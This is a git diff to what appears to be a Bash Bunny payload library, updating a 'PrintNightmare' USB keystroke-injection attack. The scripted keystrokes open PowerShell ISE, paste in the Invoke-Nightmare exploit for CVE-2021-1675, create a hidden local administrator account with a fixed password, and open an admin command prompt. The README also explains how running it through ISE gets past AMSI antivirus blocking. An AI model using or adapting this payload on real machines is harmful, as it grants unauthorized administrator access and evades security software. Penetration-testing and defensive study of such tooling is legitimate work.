diff --git a/payloads/library/execution/PrintNightmare/README.md b/payloads/library/execution/PrintNightmare/README.md
index 0c3814e3..6c1277ca 100644
--- a/payloads/library/execution/PrintNightmare/README.md
+++ b/payloads/library/execution/PrintNightmare/README.md
@@ -1,18 +1,25 @@ Title: PrintNightmare -Author: PanicACid -Version: 1.1 -Leverages the following Powershell script https://github.com/calebstewart/CVE-2021-1675 to invoke the PrintNightmare Vuln and create a local administator +Author: PanicAcid -As Powershell ASAI or whatever it's called kept picking it up and blocking it. However if we run it via PowersShell ISE it works fine. So we're going to type out the whole thing! +Version: 1.2 + + +Leverages the following Powershell script https://github.com/calebstewart/CVE-2021-1675 to invoke the PrintNightmare Vuln and create a local administator account, without bypassing defender or exectuon policy. It aint prudy but it works. + +Powershell AMSI or whatever it's called kept picking it up and blocking it every time I tried to call the script externally, even bypassing execution policy seemed to work but the output would always contain "This script contains malicious content and has been blocked by your antivirus software." + +However if we run it via PowersShell ISE it works fine. So we're going to type out the whole thing! (Well copy and paste it!) Huge thanks to Cribbit for the clipboard string- without it I would have been typing out the whole thing which when I tried it took FOREVER. Additionally thanks to Korben and Foxtrot for putting up with my nonsense. +NOTE - you may need to tweak the delays a bit, with version 1.0 I took for granted that it ran really fast on my machine which caused some issues for other folks whereby it'd close the ise window before finishing execution etc. so test and tweak the dealys to your hearts content. # Purple.............Loading # Green .............Execute # Off................Finished + Note that it's set to GB for my language, set to yours so you get the correct \'s when copying the text file to clipboard. -Other than that it creates the function for Invoke-Nightmare and then uses that to create our Hak5Rules user (which is an admin) and then launches CMD as said admin. 
+Other than that it creates the function for Invoke-Nightmare and then uses that to create our Hak5Rules user (which is an admin) and then launches CMD as said admin. If you want to change the details it uses to create your user it's the last line of juicybits.txt
diff --git a/payloads/library/execution/PrintNightmare/juicybit.txt b/payloads/library/execution/PrintNightmare/juicybit.txt
index bcfef726..4435487a 100644
--- a/payloads/library/execution/PrintNightmare/juicybit.txt
+++ b/payloads/library/execution/PrintNightmare/juicybit.txt
@@ -520,4 +520,8 @@ function struct
 $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Unbox_Any, $StructBuilder)
 $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Ret)
 $StructBuilder.CreateType()
-}
\ No newline at end of file
+}
+
+Invoke-Nightmare -DriverName 'Hak5Rules' -NewUser 'Hak5Rules' -NewPassword 'Hak5Rules'
+
+exit
\ No newline at end of file
diff --git a/payloads/library/execution/PrintNightmare/payload.txt b/payloads/library/execution/PrintNightmare/payload.txt
index 614187e4..f380f7de 100644
--- a/payloads/library/execution/PrintNightmare/payload.txt
+++ b/payloads/library/execution/PrintNightmare/payload.txt
@@ -1,12 +1,22 @@
-# Title: Quick and Dirty PrintNightmare
-# Author: PanicACid
-# Version: 1.1
+#Title: PrintNightmare
+#Author: PanicAcid
+#Version: 1.2
 #
-# Leverages the following Powershell script https://github.com/calebstewart/CVE-2021-1675 to invoke the PrintNightmare Vuln and create a local administator
-# As Powershell ASAI or whatever it's called kept picking it up and blocking it. However if we run it via PowersShell ISE it works fine. So we're going to type out the whole
-# thing!
-# Huge thanks to Cribbit for the clipboard string- without it I would have been typing out the whole thing which when I tried it took FOREVER. Additionally thanks to Korben and
-# Foxtrot for putting up with my nonsense.
+#Leverages the following Powershell script https://github.com/calebstewart/CVE-2021-1675 to invoke the PrintNightmare Vuln and create a local administator account
+#without bypassing defender or exectuon policy. It aint prudy but it works.
+#
+#Powershell AMSI or whatever it's called kept picking it up and blocking it every time I tried to call the script externally,
+#even bypassing execution policy seemed to work but the output would always contain
+#"This script contains malicious content and has been blocked by your antivirus software."
+#
+#However if we run it via PowersShell ISE it works fine. So we're going to type out the whole thing! (Well copy and paste it!)
+#
+#Huge thanks to Cribbit for the clipboard string- without it I would have been typing out the whole thing which when I tried it took FOREVER.
+#Additionally thanks to Korben and Foxtrot for putting up with my nonsense.
+#
+# NOTE - you may need to tweak the delays a bit, with version 1.0 I took for granted that it ran really fast on my machine which caused
+# some issues for other folks whereby it'd close the ise window before finishing execution etc. so test and tweak the dealys to your hearts
+# content.
 #
 # Purple.............Loading
 # Green .............Execute
@@ -37,7 +47,7 @@ QUACK ENTER
 QUACK DELAY 100
 QUACK STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\juicybit.txt'))"
 QUACK ENTER
-QUACK DELAY 500
+QUACK DELAY 200
 QUACK STRING exit
 QUACK ENTER
 QUACK DELAY 500
@@ -50,18 +60,14 @@ QUACK CONTROL d
 QUACK CONTROL v
 QUACK CONTROL d
 QUACK ENTER
-QUACK DELAY 2000
-QUACK STRING "Invoke-Nightmare -DriverName 'Hak5Rules' -NewUser 'Hak5Rules' -NewPassword 'Hak5Rules'"
-QUACK ENTER
-QUACK DELAY 4000
-QUACK ALT F4
+QUACK DELAY 3000
 QUACK GUI r
 QUACK DELAY 500
 QUACK STRING cmd
 QUACK DELAY 150
 QUACK ENTER
 QUACK DELAY 150
-QUACK STRING "runas /user:Hak5Rules cmd.exe && exit"
+QUACK STRING "runas /noprofile /user:Hak5Rules cmd.exe && exit"
 QUACK ENTER
 QUACK DELAY 150
 QUACK STRING Hak5Rules
@@ -70,4 +76,4 @@ QUACK ENTER #----------------------------------- # Kill the lights - finished -LED FINISH +LED FINISH \ No newline at end of file